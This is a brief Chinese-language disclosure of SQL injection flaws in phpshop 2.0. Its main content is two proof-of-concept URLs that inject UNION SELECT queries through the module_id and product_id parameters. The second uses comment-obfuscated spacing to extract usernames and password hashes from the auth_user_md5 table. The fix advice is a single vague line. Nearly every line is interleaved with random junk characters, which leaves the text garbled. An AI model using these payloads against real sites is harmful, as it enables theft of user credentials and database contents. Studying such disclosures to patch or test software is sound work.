标题 : phpshop 2.0 SQL Injection Vulnerability
5 M* E8 v& \6 T# O% J
0 A3 B2 t3 `' l/ E7 d& B# H作者 : By onestree
# J! O9 o; w6 \: Y2 x# F1 |: h下载地址 : http://code.google.com/p/phpshop/downloads/list0 {- n# W6 E0 @* L z
测试地址: windows 7 / ubuntu
) b% u9 | H+ |- t r& q/ ?
' ?( t5 I5 D0 {0 o0 N' u p! I
1 S g2 }/ W* ]) Y# Q8 q fSQLi p0c:
8 ]( B( ]7 [2 j$ P& I
2 V$ w1 {% O. H4 {3 t8 D) I==================
9 b) ~4 I6 m) Y3 ~: r, @ ' L7 o$ W/ d& v f) y4 u: ^, i4 \
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
/ c x1 m& N& Z" e/ B: m- munion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --% o5 A1 H# S! h1 R# v
' \: V1 |; [2 I0 hhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( Z5 r, O5 Z. O, P6 q5 Q
$ p& k$ ^- X# h8 e修复:' |9 h& M* \4 \! W4 T( q! ?
加强过滤
( }9 t# r0 u. I$ O" M* k; E2 H3 q' o' |" m) c9 F; M8 r0 g
2 h. k) Y) Z6 i3 g# G
|